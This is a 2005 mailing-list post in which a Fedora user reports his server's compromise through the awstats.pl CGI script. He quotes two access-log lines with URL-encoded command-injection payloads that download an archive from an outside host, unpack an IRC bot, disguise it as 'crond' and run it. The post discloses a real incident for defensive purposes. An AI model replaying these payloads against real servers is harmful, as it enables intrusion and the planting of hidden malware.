Security Breach
Chris Strzelczyk
cstrzelczyk at nobletechnology.net
Fri Mar 4 16:40:18 UTC 2005
Hey guys,
I just though I would let you know how my server got compromised. This
even happend after I installed the new version of awstats on Wednesday.
So in short I don't know if it is OK to run awstats as a cgi executable.
These are from my access log:
"GET
/cgi-bin/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2
0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta
r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec
ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
"GET
/cgi-bin/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi
lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20
psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%
2500 HTTP/1.1" 200 634 "-" "-"
-cs
More information about the fedora-list
mailing list